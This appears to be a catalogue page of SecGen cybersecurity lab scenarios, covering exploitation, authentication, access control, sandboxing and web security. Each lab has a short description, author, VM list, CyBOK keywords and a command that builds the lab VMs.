ruby secgen.rb -s scenarios/labs/software_security_exploitation/7_linux_aslr_bypass.xml run

View source

software_security_exploitation/8_linux_bof_format.xml

Details

Key Data
Name Linux Buffer Overflows and Advanced Format String Attacks
Description
Introduction
In this lab, you will face some additional challenges designed to help you develop your understanding of software security and vulnerabilities. You will learn how to perform Format String Attacks, a type of vulnerability that allows attackers to manipulate the memory of a program by exploiting how it handles format specifiers. Additionally, you will further explore Buffer Overflows, a common security issue that arises when programs do not properly manage memory, leading to the overwriting of critical data.
Lab sheet https://docs.google.com/document/d/1Ap-h6YSDtfU4bLwiKhxP5x2nf1vjSJ2V2zEL5wzW84U/edit?usp=sharing
Type ctf-lab; lab-sheet
Author Thomas Shaw
VM names metactf_desktop

CyBOK KAs, Topics, and Keywords

KA Topic Keywords
Software Security (SS) Categories of Vulnerabilities memory management vulnerabilities; Stack smashing buffer overflows; Format string attacks
Malware & Attack Technology (MAT) Attacks and exploitation EXPLOITATION; EXPLOITATION FRAMEWORKS; Exploit development; Metasploit Framework development

Command to build VMs and start scenario:

ruby secgen.rb -s scenarios/labs/software_security_exploitation/8_linux_bof_format.xml run

View source

systems_security/1_authentication.xml

Details

Key Data
Name Authentication lab
Description
Introduction
Authentication is the process of verifying a user's identity, ensuring that individuals are who they claim to be before granting them access to systems and resources. This lab will provide you with hands-on experience, enabling you to explore the intricacies of user accounts and identity on Unix/Linux systems, gain insights into password storage and hashing, and even attempt to crack passwords using dictionary attacks. By the end of this lab, you will have a deeper understanding of how authentication works, the role of password security, and the importance of safeguarding user identities.

Throughout this lab, you will learn about user accounts, their attributes, and their association with user and group IDs. You'll also explore the concept of salts in password hashing, understand the strengths and weaknesses of different passwords, and attempt to crack passwords using tools like John the Ripper. Practical tasks include examining the system's /etc/passwd and /etc/group files, changing user identities, and analyzing the /etc/shadow file to understand password storage. By actively engaging in these activities, you will gain a comprehensive understanding of authentication processes and the key factors that contribute to securing user identities in Unix/Linux systems.

Hackerbot and CTF challenges
This is a Hackerbot lab. The labsheet is available once you claim a set of VMs. Work through the labsheet, then when prompted interact with Hackerbot.

The Hackerbot tasks in this lab involve configuring new users and group membership. Then you will attempt to crack the passwords of users on the desktop VM whose user IDs (UIDs) are higher than 1001. After successfully cracking passwords, you will use these credentials to SSH into the separate server VM, where you will discover flags. This task showcases the practical implications of password security and cracking.

Lecture
Slides here

Reading
Chapter 11 "Authentication": Bishop, M. (2004), Introduction to Computer Security, Addison-Wesley. (ISBN-10: 0321247442)
Type ctf-lab; hackerbot-lab; lab-sheet
Author Z. Cliffe Schreuders
Linked videos https://youtu.be/2I_JSdTu-oI; https://youtu.be/pGcJEML1mRo; https://youtu.be/icC2Zrno_uM; https://youtu.be/Wrg6XZu6Luw
VM names desktop; server; hackerbot_server; kali_cracker

CyBOK KAs, Topics, and Keywords

KA Topic Keywords
Authentication, Authorisation & Accountability (AAA) Authentication identity management; user authentication; facets of authentication; Cryptography and authentication (hashes and attacks against authentication schemes / passwords)
Operating Systems & Virtualisation (OSV) Primitives for Isolation and Mediation authentication and identification; Linux authentication; Types of user accounts

Command to build VMs and start scenario:

ruby secgen.rb -s scenarios/labs/systems_security/1_authentication.xml run

View source

systems_security/2_pam.xml

Details

Key Data
Name Pluggable Authentication Modules lab
Description
Introduction
In this lab, you will explore Pluggable Authentication Modules (PAM) and Secure Shell (SSH) to enhance your understanding of authentication and security in Linux and Unix-like systems. PAM is a component that allows for the flexibility and extensibility of authentication methods, making it possible for various programs to leverage different authentication schemes, providing a standardized way to configure and manage authentication rules.

Throughout the lab, you will gain hands-on experience with PAM by examining available PAM modules, understanding the structure of PAM configuration files, and making modifications to enforce policies including: password complexity requirements, time constraints, lockout policies after repeated login failures, creating home directories, enforcing session limits through cron jobs. You will also explore SSH password-less authentication, a powerful method of securely accessing remote systems without the need for traditional passwords. By generating SSH key pairs and configuring authorized keys, you will learn how to enhance the security and convenience of remote access.

By the end of this lab, you will have a solid grasp of PAM's role in authentication, the benefits of SSH key-based authentication, and the practical skills to enhance the security and usability of authentication mechanisms in Linux systems.

Hackerbot and CTF challenges
This is a Hackerbot lab. The labsheet is available once you claim a set of VMs. Work through the labsheet, then when prompted interact with Hackerbot.

The Hackerbot tasks involve configuring password policies, testing your ability to use PAM to enhance authentication security.

Lecture
Slides continued here

Reading
Chapter 4 "Users, Passwords, and Authentication": Garfinkel, S. Spafford, G. and Schwartz, A. (2003), Practical Unix and Internet Security, O'Reilly. (ISBN-10: 0596003234)

Type ctf-lab; hackerbot-lab; lab-sheet
Author Z. Cliffe Schreuders
Linked videos https://youtu.be/z4L6Yv5ry1A; https://youtu.be/-zcnfmoLjYI; https://youtu.be/xHs3LB4Yyrk; https://youtu.be/c2dPdQmaVyo; https://youtu.be/dCBabesIXo8; https://youtu.be/rhdcxhSDqp4; https://youtu.be/PCXK2cK8tpE
VM names desktop; server; hackerbot_server

CyBOK KAs, Topics, and Keywords

KA Topic Keywords
Authentication, Authorisation & Accountability (AAA) Authentication identity management; user authentication; facets of authentication
Operating Systems & Virtualisation (OSV) Primitives for Isolation and Mediation authentication and identification; Linux authentication; Authentication frameworks (PAM)

Command to build VMs and start scenario:

ruby secgen.rb -s scenarios/labs/systems_security/2_pam.xml run

View source

systems_security/4_access_controls.xml

Details

Key Data
Name Access Controls lab
Description
Introduction
Access control involves authorizing and mediating access to resources, determining what actions are permitted, and enforcing security policies. In this lab, you will delve into access control and Unix file permissions, gaining a practical understanding of how they work and their significance in maintaining system security. The lab will introduce you to subjects and objects in the context of access control, different access control models, and Unix file permissions.

Throughout this lab, you will learn how to view and manipulate file permissions in a Unix-like operating system. You will explore the concept of inodes, examine file permissions using the ls command, create and manage hard and symbolic links to files, and understand how directory-level permissions affect file access. Additionally, you will work with the chmod command to change file permissions and discover the significance of the umask command in setting default permissions for new files. By the end of this lab, you will have an understanding of access control, file permissions, and practical skills in managing access rights on a Linux system.

Hackerbot and CTF challenges
This is a Hackerbot lab. The labsheet is available once you claim a set of VMs. Work through the labsheet, then when prompted interact with Hackerbot.

The Hackerbot tasks are designed to provide hands-on experience in managing user access, group permissions, and file ownership, and will enhance your understanding of access control mechanisms. You will create files with specific permissions, ownership, and group assignments while ensuring that other users are appropriately restricted from accessing these files.

Lecture
Slides here

Reading
Chapter 1 "Foundations of Security and Access Control in Computing": Benantar, M. (2006), Access Control Systems: Security, Identity Management and Trust Models, Springer. (ISBN-10: 0387004459)
Type ctf-lab; hackerbot-lab; lab-sheet
Author Z. Cliffe Schreuders
Linked videos https://youtu.be/yWJyZEFbchQ; https://youtu.be/i0kO_3ExJv4
VM names shared_desktop; server; hackerbot_server

CyBOK KAs, Topics, and Keywords

KA Topic Keywords
Authentication, Authorisation & Accountability (AAA) Authorisation access control; enforcing access control; ACCESS CONTROL - DAC (DISCRETIONARY ACCESS CONTROL); Vulnerabilities and attacks on access control misconfigurations
Operating Systems & Virtualisation (OSV) Primitives for Isolation and Mediation Access controls and operating systems; Linux security model; Unix File Permissions; Filesystems; inodes; and commands; umask
Operating Systems & Virtualisation (OSV) Role of Operating Systems mediation

Command to build VMs and start scenario:

ruby secgen.rb -s scenarios/labs/systems_security/4_access_controls.xml run

View source

systems_security/5_suid.xml

Details

Key Data
Name Set User ID lab
Description
Introduction
Special file permissions, such as Set UID (SUID) and Set GID (SGID) play a crucial role in Unix-based operating systems by enabling certain processes to run with elevated privileges. Understanding SUID and SGID provides insights into access controls and how Unix systems handle privilege escalation while maintaining control over who can execute specific operations. This lab will empower you with practical knowledge on the use and implications of SUID and SGID.

Throughout this lab, you will learn about the concepts of Real UID (RUID) and Effective UID (EUID), explore SUID and SGID permissions in detail, and analyze their significance in managing system security. You will inspect processes to identify cases where RUID and EUID differ, discover SUID and SGID programs on your system, and understand why they require these special permissions. Additionally, you will compile a SUID C program, assess its security implications, and modify it to rectify vulnerabilities. By the end of this lab, you will have a comprehensive understanding of SUID and SGID, their importance in Unix system security, and practical experience in working with SUID programs.

Hackerbot and CTF challenges
This is a Hackerbot lab. The labsheet is available once you claim a set of VMs. Work through the labsheet, then when prompted interact with Hackerbot.

In the Hackerbot tasks, you'll use SUID to mediate access to a file (accessible exclusively by a specific user through a SUID executable). There are also some problem-based challenges involving hardlinks, relative paths, and combining shell programs with SGID and SUID permissions.

Lecture
Slides continued here

Reading
Chapter 6 "Filesystems and Security": Garfinkel, S. Spafford, G. and Schwartz, A. (2003), Practical Unix and Internet Security, O'Reilly. (ISBN-10: 0596003234)
Type ctf-lab; hackerbot-lab; lab-sheet
Author Z. Cliffe Schreuders
Linked videos https://youtu.be/viSkkNB777k; https://youtu.be/PGHsb3bg_h4
VM names shared_desktop; server; hackerbot_server

CyBOK KAs, Topics, and Keywords

KA Topic Keywords
Authentication, Authorisation & Accountability (AAA) Authorisation access control; Elevated privileges; Real and effective identity; Vulnerabilities and attacks on access control misconfigurations
Operating Systems & Virtualisation (OSV) Primitives for Isolation and Mediation Access controls and operating systems; Linux security model; Unix File Permissions; setuid/setgid; Hardlink protections

Command to build VMs and start scenario:

ruby secgen.rb -s scenarios/labs/systems_security/5_suid.xml run

View source

systems_security/6_facls.xml

Details

Key Data
Name Access Control Lists (ACLs) lab
Description
Introduction
Access Control Lists (ACLs) are sets of rules attached to resources, specifying which subjects (users or entities) are authorized to access the resource and the type of permissions granted to each subject. ACLs allow for a granular and flexible approach to managing who can access a file, what kind of access they have, and how these permissions are inherited and checked.

You will learn about the fundamental concepts of Full ACLs, their syntax and usage on Linux systems, and how they differ from traditional Unix file permissions. Through hands-on tasks, you will set ACLs on files, manipulate permissions for specific users, explore the mask entry's role in determining maximum permissions, and understand the behavior of access checks in ACLs. Additionally, you will discover the concept of default ACLs and their impact on newly created files within a directory. By comparing Linux ACLs to Windows ACLs, you'll gain insights into the unique features and nuances of each system, such as inheritance logic and the use of global security identifiers. This lab will equip you with practical skills and knowledge to manage access control effectively in a diverse range of computing environments.

Hackerbot and CTF challenges
This is a Hackerbot lab. The labsheet is available once you claim a set of VMs. Work through the labsheet, then when prompted interact with Hackerbot.

The Hackerbot tasks involve creating and managing files and directories using Linux ACLs to control access, allowing specific users to read and write while denying access to others. There is also a file permissions challenge on a server where you take what you've learned over the last few topics to find and exploit a permissions weakness.

Lecture
Slides continued here

Reading
Grunbacher, Andreas. "POSIX Access Control Lists on Linux." USENIX Annual Technical Conference, FREENIX Track. 2003.
Type ctf-lab; hackerbot-lab; lab-sheet
Author Z. Cliffe Schreuders
Linked videos https://youtu.be/Bn3NJhgmdLk; https://youtu.be/OT7ifs8PkHI
VM names shared_desktop; server; hackerbot_server

CyBOK KAs, Topics, and Keywords

KA Topic Keywords
Authentication, Authorisation & Accountability (AAA) Authorisation access control; ACCESS CONTROL LIST (ACL); Vulnerabilities and attacks on access control misconfigurations
Operating Systems & Virtualisation (OSV) Primitives for Isolation and Mediation Access controls and operating systems; Linux security model; Linux Extended Access Control Lists (facl)

Command to build VMs and start scenario:

ruby secgen.rb -s scenarios/labs/systems_security/6_facls.xml run

View source

systems_security/7_containers.xml

Details

Key Data
Name Containers lab
Description
Introduction
Sandboxing involves restricting the capabilities of individual programs or groups of programs, minimizing the potential damage a rogue program can inflict on a system. This lab focuses on container-based sandboxes and the use of chroot. You will learn how to create a chroot environment, effectively isolating a set of programs within a directory, and run commands inside this sandbox. Furthermore, the lab introduces you to Docker, a popular tool that builds upon the principles of chroot and adds features to automate the creation and deployment of containerized operating systems and applications. You will explore the concept of Docker images as reusable base environments and containers as instances of these images. You will create and manage containers, observe the speed and efficiency of containerization compared to traditional chroot, and analyze the level of isolation Docker provides. This lab equips you with practical knowledge of sandboxing and isolation.

Hackerbot and CTF challenges
This is a Hackerbot lab. The labsheet is available once you claim a set of VMs. Work through the labsheet, then when prompted interact with Hackerbot.

You need to find a way into then escape to root a docker container and a chroot container. The flags are stored in /root/ on the two VMs but you first need to find your way in (try a port scan and try connecting to open ports), and then escape confinement.

Lecture
Slides here

Reading
Z. C. Schreuders, T. McGill, and C. Payne, "The State of the Art of Application Restrictions and Sandboxes: A Survey of Application-oriented Access Controls and their Shortfalls," Computers and Security, Volume 32, Elsevier B.V., 2013. DOI: 10.1016/j.cose.2012.09.007

Lab
This is a Hackerbot lab. The labsheet is available once you claim a set of VMs. Work through the labsheet, then when prompted interact with Hackerbot.
Type ctf-lab; hackerbot-lab; lab-sheet
Author Z. Cliffe Schreuders
Linked videos https://youtu.be/f4yBcKkb12g
VM names desktop; hackerbot_server; chroot_esc_server; docker_esc_server

CyBOK KAs, Topics, and Keywords

KA Topic Keywords
Authentication, Authorisation & Accountability (AAA) Authorisation SANDBOX; Application-based access controls: user-based access controls insufficiently limit privileges
Operating Systems & Virtualisation (OSV) Primitives for Isolation and Mediation capabilities; Container-based sandboxes: chroot; Docker; Rule-based controls: Course grained: Linux capabilities; Vulnerabilities and attacks on sandboxing misconfigurations
Operating Systems & Virtualisation (OSV) Role of Operating Systems isolation; CONTAINERS
Web & Mobile Security (WAM) Fundamental Concepts and Approaches sandboxing

Command to build VMs and start scenario:

ruby secgen.rb -s scenarios/labs/systems_security/7_containers.xml run

View source

systems_security/8_apparmor.xml

Details

Key Data
Name AppArmor lab
Description
Introduction
Mandatory Access Controls (MAC) encompass mechanisms such as Capabilities and AppArmor, which provide system-wide access controls to manage and enforce permissions for processes and applications, mitigating security risks and enhancing overall system security. In this lab, you will explore two aspects of system-wide access controls in Linux security: Capabilities and AppArmor.

First, you will delve into the concept of Capabilities, a coarse-grained approach to control privileges in Linux. You will learn how capabilities can be used to grant specific permissions to programs without having them run as the all-powerful root user. You will also explore AppArmor, a rule-based, fine-grained access control system for Linux. You will examine how AppArmor profiles are used to specify the resources and permissions that a program can access, effectively creating a whitelist of allowed actions. You will create rules and experience the learning mode of AppArmor, which helps construct rules based on actual program behavior and understand the advantages and disadvantages of a blacklist (deny) versus a whitelist (ignore) approach to writing AppArmor rules. By the end of this lab, you will have a deep understanding of how capabilities and AppArmor can enhance the security of your Linux system by controlling what programs can do and which resources they can access.

Hackerbot and CTF challenges
This is a Hackerbot lab. The labsheet is available once you claim a set of VMs. Work through the labsheet, then when prompted interact with Hackerbot.

Hackerbot will challenge you to use AppArmor to provide a shell to attackers, with only limitted access to specific resources.

Lecture
Slides continued here

Lectures for the next two weeks
Secure software development

Secure design principles

Slides
Type ctf-lab; hackerbot-lab; lab-sheet
Author Z. Cliffe Schreuders
Linked videos https://youtu.be/Xgs5akM6ayc
VM names desktop; hackerbot_server

CyBOK KAs, Topics, and Keywords

KA Topic Keywords
Authentication, Authorisation & Accountability (AAA) Authorisation ACCESS CONTROL - MAC (MANDATORY ACCESS CONTROL); ACCESS CONTROL - NDAC (NON-DISCRETIONARY ACCESS CONTROL); Application-based access controls: user-based access controls insufficiently limit privileges; Rule-based sandboxes
Operating Systems & Virtualisation (OSV) Primitives for Isolation and Mediation Rule-based controls: Fine grained: AppArmor; Vulnerabilities and attacks on sandboxing misconfigurations
Software Security (SS) Mitigating Exploitation limiting privileges

Command to build VMs and start scenario:

ruby secgen.rb -s scenarios/labs/systems_security/8_apparmor.xml run

View source

web_security/1_intro_web_security.xml

Details

Key Data
Name Introducing Web security
Description
Introduction
In this lab you will delve into concepts and practical exercises that will equip you with a foundational understanding of web security. This hands-on lab explores various aspects of web security, starting with an introduction to client-server interactions using HTTP (HyperText Transfer Protocol). The lab guides you through simulating a web server from scratch using tools like netcat, creating dynamic web pages with PHP, and understanding the intricacies of client-server architecture. The importance of local web proxies, illustrated through the use of Zed Attack Proxy (ZAP), is emphasized as a means to intercept and modify web traffic for security testing purposes. The lab further introduces fuzzing techniques in ZAP and encourages practical application through tasks such as intercepting and altering HTTP requests.

Throughout this lab, you will learn by doing, actively engaging in activities. As part of the hands-on experience, you will also work through scored flag-based tasks, such as completing challenges related to Insecure Direct Object References. By the end of the lab, you will have acquired a solid foundation in web security fundamentals, simulation of web server activities, and practical skills in using tools like ZAP for security testing and assessment. This sets the stage for deeper exploration and learning in subsequent topics, contributing to the development of your web security expertise.
Lab sheet https://docs.google.com/document/d/1vLy56U53lqb8ZpQVLwxznCBsGv0KPM_uXJW1WD5DCiI/edit?usp=sharing
Type ctf-lab; lab-sheet
Author James Davis
VM names web_server; kali

CyBOK KAs, Topics, and Keywords

KA Topic Keywords
Web & Mobile Security (WAM) Fundamental Concepts and Approaches JAVASCRIPT; HYPERTEXT MARKUP LANGUAGE (HTML); CASCADING STYLE SHEETS (CSS); HYPERTEXT TRANSFER PROTOCOL (HTTP); HYPERTEXT TRANSFER PROTOCOL (HTTP) - PROXYING; Broken Access Control / Insecure Direct Object References; CLIENT-SERVER MODELS
Web & Mobile Security (WAM) Server-Side Vulnerabilities and Mitigations server-side misconfiguration and vulnerable components
Software Security (SS) Categories of Vulnerabilities Web vulnerabilities / OWASP Top 10
Software Security (SS) Detection of Vulnerabilities dynamic detection

Command to build VMs and start scenario:

ruby secgen.rb -s scenarios/labs/web_security/1_intro_web_security.xml run

View source

web_security/2_sessions_and_cookies.xml

Details

Key Data
Name Session Management
Description
In this web security lab you will delve into sessions and cookies. The relevance of this lies in the critical role cookies play in web interactions, enabling websites to remember user states and enhance user experiences. The lab employs practical exercises and open-ended challenges, utilizing tools such as Damn Vulnerable Web App (DVWA), OWASP WebGoat, and OWASP Security Shepherd. As you navigate through the labs, you will gain hands-on experience in understanding cookies, creating a basic PHP page to set cookies, using a local web proxy (OWASP Zap) to inspect cookie interactions, and exploring session cookies. This practical approach provides a foundation for subsequent topics like cross-site scripting and cross-site request forgery.

Throughout the lab, you will learn to self-host PHP pages, use OWASP Zap to analyze and manipulate cookies, and comprehend the nuances of session cookies. The DVWA challenges offer a real-world application of your knowledge, requiring you to assess and exploit vulnerabilities at different security levels. For instance, you will investigate weaknesses in session ID generation, analyze source code for session IDs, and assess the security implications of various approaches. Additionally, CTF tasks in Security Shepherd will provide hands-on experiences in session management, poor data validation, and security misconfigurations. By completing these challenges, you will develop practical skills addressing complex security scenarios mirroring the challenges faced by penetration testers and ethical hackers in real-world scenarios.
Lab sheet https://docs.google.com/document/d/1xcbf0bqtdMGgJAjeedw5MUbkRosMyQ_UZ0gN4IeCBFs/edit?usp=sharing
Type lab-environment; ctf-lab
Author James Davis
VM names web_server; kali

CyBOK KAs, Topics, and Keywords

KA Topic Keywords
Web & Mobile Security (WAM) Fundamental Concepts and Approaches cookies; HYPERTEXT MARKUP LANGUAGE (HTML); HYPERTEXT TRANSFER PROTOCOL (HTTP); HYPERTEXT TRANSFER PROTOCOL (HTTP) - PROXYING; Broken Access Control / Insecure Direct Object References; SESSION HIJACKING; CLIENT-SERVER MODELS
Web & Mobile Security (WAM) Client-Side Vulnerabilities and Mitigations client-side storage
Web & Mobile Security (WAM) Server-Side Vulnerabilities and Mitigations server-side misconfiguration and vulnerable components
Software Security (SS) Categories of Vulnerabilities Web vulnerabilities / OWASP Top 10
Software Security (SS) Detection of Vulnerabilities dynamic detection

Command to build VMs and start scenario:

ruby secgen.rb -s scenarios/labs/web_security/2_sessions_and_cookies.xml run

View source

web_security/3_xss.xml

Details

Key Data
Name Cross-Site Scripting
Description
Introduction
In this web security lab you will delve into the critical realm of web application security, focusing specifically on the pervasive threat of Cross-Site Scripting (XSS). XSS is a type of injection attack where malicious code is inserted into a trusted website, often exploiting vulnerabilities in user input handling. The lab covers three main types of XSS attacks: Reflected, Stored, and DOM-Based. These attacks involve injecting malicious scripts into a web application, potentially compromising user data, sessions, and overall security. The lab introduces theoretical concepts behind XSS and provides hands-on experience through practical exercises and challenges.

Throughout this lab, you will engage with various learning resources, including Damn Vulnerable Web App (DVWA), OWASP WebGoat and WebWolf, and OWASP Security Shepherd. The hands-on activities involve creating and manipulating PHP pages, implementing XSS filters, and exploring vulnerabilities in web applications using DVWA challenges. You will also work with WebGoat and Security Shepherd to further validate your understanding of XSS attacks in different scenarios. By the end of this lab, you will have gained practical insights into identifying, exploiting, and mitigating XSS vulnerabilities, a crucial skill in the field of web security.
Lab sheet https://docs.google.com/document/d/1f7hD_sZnBChklLZmskpxp1dIJUG9Ntw_06t76ltnPTk/edit?usp=sharing
Type lab-environment; ctf-lab
Author James Davis
VM names web_server; kali

CyBOK KAs, Topics, and Keywords

KA Topic Keywords
Web & Mobile Security (WAM) Fundamental Concepts and Approaches cookies; JAVASCRIPT; HYPERTEXT MARKUP LANGUAGE (HTML); HYPERTEXT TRANSFER PROTOCOL (HTTP) - PROXYING; SESSION HIJACKING; CLIENT-SERVER MODELS
Web & Mobile Security (WAM) Client-Side Vulnerabilities and Mitigations client-side storage; CLIENT-SIDE VALIDATION
Web & Mobile Security (WAM) Server-Side Vulnerabilities and Mitigations injection vulnerabilities; server-side misconfiguration and vulnerable components; CROSS-SITE SCRIPTING (XSS); BACK-END
Software Security (SS) Categories of Vulnerabilities Web vulnerabilities / OWASP Top 10
Software Security (SS) Prevention of Vulnerabilities coding practices; Protecting against session management attacks; XSS; SQLi; CSRF
Software Security (SS) Detection of Vulnerabilities dynamic detection

Command to build VMs and start scenario:

ruby secgen.rb -s scenarios/labs/web_security/3_xss.xml run

View source

web_security/4_sqli.xml

Details

Key Data
Name SQL injection
Description
Introduction
In this web security lab you will delve into the critical realm of SQL injection attacks, a prevalent threat to web applications. SQL injection occurs when untrusted data is injected into a database query, exploiting vulnerabilities in the application's handling of user inputs. The lab adopts a hands-on approach, utilizing hands-on learning resources such as Damn Vulnerable Web App (DVWA), OWASP WebGoat, and OWASP Security Shepherd to guide you through understanding, detecting, and mitigating SQL injection vulnerabilities. The lab emphasizes the importance of working through different layers of security, from client-side validation to application-level filtering, to ultimately interact with the database directly. Through practical exercises and challenges, you will gain an understanding of SQL injection, including blind SQL injection attacks, and learn essential techniques to secure web applications against these threats.

Throughout this lab, you will engage in a series of tasks across various platforms. Starting with WebGoat, you will log in and progress through SQL injection exercises, honing your skills in crafting attacks and understanding mitigation strategies. In DVWA challenges, you will undertake guided walk-throughs at low, medium, and high security levels to retrieve passwords, crack hashed passwords, and master blind SQL injection. Further, Security Shepherd tasks will enhance your skills in session management and SQL injection, reinforcing your ability to apply theoretical concepts in real-world scenarios. By the end, you will have not only learned about SQL injection but also independently completed challenges, solidifying your expertise in securing web applications against this pervasive security threat.
Lab sheet https://docs.google.com/document/d/1G_b4f25ufopbDw6djpO1D-nhbJ7vFOCY-QZJtoTUSKg/edit?usp=sharing
Type lab-environment; ctf-lab
Author James Davis
VM names web_server; kali

CyBOK KAs, Topics, and Keywords

KA Topic Keywords
Web & Mobile Security (WAM) Fundamental Concepts and Approaches HYPERTEXT MARKUP LANGUAGE (HTML); HYPERTEXT TRANSFER PROTOCOL (HTTP) - PROXYING; DATABASE; SESSION HIJACKING; CLIENT-SERVER MODELS
Web & Mobile Security (WAM) Server-Side Vulnerabilities and Mitigations injection vulnerabilities; server-side misconfiguration and vulnerable components; SQL-INJECTION; BACK-END; BLIND ATTACKS
Software Security (SS) Categories of Vulnerabilities Web vulnerabilities / OWASP Top 10
Software Security (SS) Prevention of Vulnerabilities coding practices; Protecting against session management attacks; XSS; SQLi; CSRF
Software Security (SS) Detection of Vulnerabilities dynamic detection

Command to build VMs and start scenario:

ruby secgen.rb -s scenarios/labs/web_security/4_sqli.xml run

View source

web_security/5_sqli_advanced.xml

Details

Key Data
Name Advanced SQL injection
Description
Introduction
In this web security lab you will delve into the intricacies of injection attacks, focusing on OS command injection and automated SQL injection. The lab begins by simulating OS command injection in a simple C application, demonstrating how unvalidated user input can lead to potential system shell exploitation. Subsequently, you will explore OS command injection in a PHP application, uncovering the risks associated with unfiltered user input in web environments. The lab sheet then introduces automated SQL injection using sqlmap, a penetration testing tool designed to detect and exploit SQL vulnerabilities efficiently.

Throughout the lab, you will engage with various vulnerable environments, including Damn Vulnerable Web App (DVWA), OWASP WebGoat, and OWASP Security Shepherd. Practical tasks include exploiting SQL injection in DVWA with different security levels, automating SQL injection attacks using sqlmap, and tackling blind SQL injection scenarios. Additionally, you will apply your knowledge to WebGoat, a web application specifically designed for learning security concepts, and complete CTF challenges in Security Shepherd. By the end of the lab, you will have gained hands-on experience in identifying, exploiting, and mitigating OS command injection and SQL injection vulnerabilities, crucial skills for securing web applications in real-world scenarios.
Lab sheet https://docs.google.com/document/d/1tj7qQ-1HbmxXaZNMOCPVECHrFAHpkRVcD_Q0FvMhIWQ/edit?usp=sharing
Type lab-environment; ctf-lab
Author James Davis
VM names web_server; kali

CyBOK KAs, Topics, and Keywords

KA Topic Keywords
Web & Mobile Security (WAM) Fundamental Concepts and Approaches HYPERTEXT MARKUP LANGUAGE (HTML); HYPERTEXT TRANSFER PROTOCOL (HTTP) - PROXYING; DATABASE; SESSION HIJACKING; CLIENT-SERVER MODELS
Web & Mobile Security (WAM) Server-Side Vulnerabilities and Mitigations injection vulnerabilities; server-side misconfiguration and vulnerable components; COMMAND INJECTION; SQL-INJECTION; BACK-END; BLIND ATTACKS
Software Security (SS) Categories of Vulnerabilities Web vulnerabilities / OWASP Top 10
Software Security (SS) Prevention of Vulnerabilities coding practices; Protecting against session management attacks; XSS; SQLi; CSRF
Software Security (SS) Detection of Vulnerabilities dynamic detection

Command to build VMs and start scenario:

ruby secgen.rb -s scenarios/labs/web_security/5_sqli_advanced.xml run

View source

web_security/6_csrf.xml

Details

Key Data
Name Cross-Site Request Forgery
Description
Introduction
In this web security lab focused on Cross-Site Request Forgery (CSRF), you will delve into the intricacies of a prevalent attack that exploits the trust websites have in their users. CSRF, also known as session riding, involves users unknowingly sending requests to services they are logged into, utilizing their session cookies and other identifying information. The lab employs resources such as Damn Vulnerable Web App (DVWA), OWASP WebGoat and WebWolf, and CTF via OWASP Security Shepherd. The theoretical foundation covers the distinction between XSS and CSRF, emphasizing CSRF's exploitation of user trust to execute state-changing transactions. The lab introduces you to tools like Zap and WebWolf, guiding you through various exercises in WebGoat and DVWA to simulate and understand CSRF attacks at different security levels.

Throughout the lab, you will engage in hands-on tasks that mirror real-world scenarios. For instance, you'll create an external form using vi text editor, host it with WebWolf, and understand the parameters necessary for a POST request. In DVWA challenges, you'll manipulate HTML forms to exploit vulnerabilities at low, medium, and high security levels. The tasks also extend to combining CSRF with XSS to overcome anti-CSRF measures. By the end of the lab, you'll have a comprehensive understanding of CSRF attacks, CORS limitations, and practical skills in executing and defending against such attacks, enhancing your expertise in web application security.
Lab sheet https://docs.google.com/document/d/1ABryiNKLDiIG6i7PQUztzzynjPo3fRSBP4OakxCPraY/edit?usp=sharing
Type lab-environment; ctf-lab
Author James Davis
VM names web_server; kali

CyBOK KAs, Topics, and Keywords

KA Topic Keywords
Web & Mobile Security (WAM) Fundamental Concepts and Approaches cookies; JAVASCRIPT; HYPERTEXT MARKUP LANGUAGE (HTML); HYPERTEXT TRANSFER PROTOCOL (HTTP) - PROXYING; DATABASE; SESSION HIJACKING; CLIENT-SERVER MODELS
Web & Mobile Security (WAM) Client-Side Vulnerabilities and Mitigations client-side storage; CLIENT-SIDE VALIDATION; clickjacking
Web & Mobile Security (WAM) Server-Side Vulnerabilities and Mitigations injection vulnerabilities; server-side misconfiguration and vulnerable components; CROSS-SITE SCRIPTING (XSS); CROSS-SITE REQUEST FORGERY (CSRF); CONFUSED DEPUTY ATTACKS; BACK-END
Software Security (SS) Categories of Vulnerabilities Web vulnerabilities / OWASP Top 10
Software Security (SS) Prevention of Vulnerabilities coding practices; Protecting against session management attacks; XSS; SQLi; CSRF
Software Security (SS) Detection of Vulnerabilities dynamic detection

Command to build VMs and start scenario:

ruby secgen.rb -s scenarios/labs/web_security/6_csrf.xml run

View source

web_security/7_additional_web.xml

Details

Key Data
Name Additional Web Challenges
Description
Introduction
Web and Network Security additional CTF challenges.
Lab sheet https://docs.google.com/document/d/1DDjyBGtB9vaFD6S2s1jQn7_bpVn4UlK-njbmVX5_UiM/edit?usp=sharing
Type lab-environment; ctf-lab
Author James Davis
VM names web_server; kali

CyBOK KAs, Topics, and Keywords

KA Topic Keywords
Web & Mobile Security (WAM) Fundamental Concepts and Approaches web PKI and HTTPS; authentication; ACCESS CONTROL; cookies; passwords and alternatives; JAVASCRIPT; HYPERTEXT MARKUP LANGUAGE (HTML); CASCADING STYLE SHEETS (CSS); HYPERTEXT TRANSFER PROTOCOL (HTTP); HYPERTEXT TRANSFER PROTOCOL (HTTP) - PROXYING; DATABASE; Broken Access Control / Insecure Direct Object References; SESSION HIJACKING; CERTIFICATES; REPRESENTATIONAL STATE TRANSFER (REST); PERMISSION DIALOG BASED ACCESS CONTROL; CLIENT-SERVER MODELS
Web & Mobile Security (WAM) Client-Side Vulnerabilities and Mitigations client-side storage; CLIENT-SIDE VALIDATION; clickjacking
Web & Mobile Security (WAM) Server-Side Vulnerabilities and Mitigations injection vulnerabilities; server-side misconfiguration and vulnerable components; CROSS-SITE SCRIPTING (XSS); SAME ORIGIN POLICY (SOP); COMMAND INJECTION; SQL-INJECTION; CROSS-SITE REQUEST FORGERY (CSRF); CONFUSED DEPUTY ATTACKS; BACK-END; BLIND ATTACKS
Software Security (SS) Categories of Vulnerabilities Web vulnerabilities / OWASP Top 10; API vulnerabilities
Software Security (SS) Prevention of Vulnerabilities coding practices; Protecting against session management attacks; XSS; SQLi; CSRF; API design
Software Security (SS) Detection of Vulnerabilities dynamic detection
Security Operations & Incident Management (SOIM) Monitor: Data Sources network traffic
Forensics (F) Main Memory Forensics network connections; data recovery and file content carving
Network Security (NS) Network Defence Tools FIREWALLS; IPTables; VIRTUAL - PRIVATE NETWORK (VPN)
Network Security (NS) Internet Architecture network layer security
Web & Mobile Security (WAM) FIREWALLS FIREWALLS

Command to build VMs and start scenario:

ruby secgen.rb -s scenarios/labs/web_security/7_additional_web.xml run

View source

web_security/websec_lab.xml

Details

Key Data
Name Web security lab environment
